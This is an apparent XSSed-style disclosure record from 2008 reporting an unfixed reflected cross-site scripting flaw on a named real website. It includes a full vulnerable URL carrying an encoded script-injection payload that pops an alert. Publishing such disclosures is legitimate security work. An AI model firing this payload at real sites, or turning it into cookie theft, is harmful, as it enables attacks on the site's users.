Unfixed XSS vulnerability at www.flamingtext.com

2008-04-11T00:00:00
ID XSSED:53741
Type xssed
Reporter Shocker -at- ShockingSoft.com
Modified 2010-11-25T00:00:00

Description

Security researcher Shocker -at- ShockingSoft.com, has submitted on 04/11/2008 a cross-site-scripting (XSS) vulnerability affecting www.flamingtext.com, which at the time of submission ranked 27428 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 25/11/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.flamingtext.com/net-fu/dynamic.cgi?cgiscript=%2Fnet-fu%2Fdynamic.cgi&script=drop-shadow-logo&text=%22%3E%3Cscript%3Ealert(/Shocker%20@%20ShockingSoft.com/)%3C/script%3E&fontname=Elementric+%28mrn%29&fontsize=70&fontname=cooper&colorBackgroundR=255&colorBackgroundG=255&colorBackgroundB=255&colorTextR=0&colorTextG=0&colorTextB=204&xOffset=4&yOffset=4&blurRadius=7&colorShadowR=0&colorShadowG=0&colorShadowB=0&shadowOpacity=80&toggleAllowResize=false&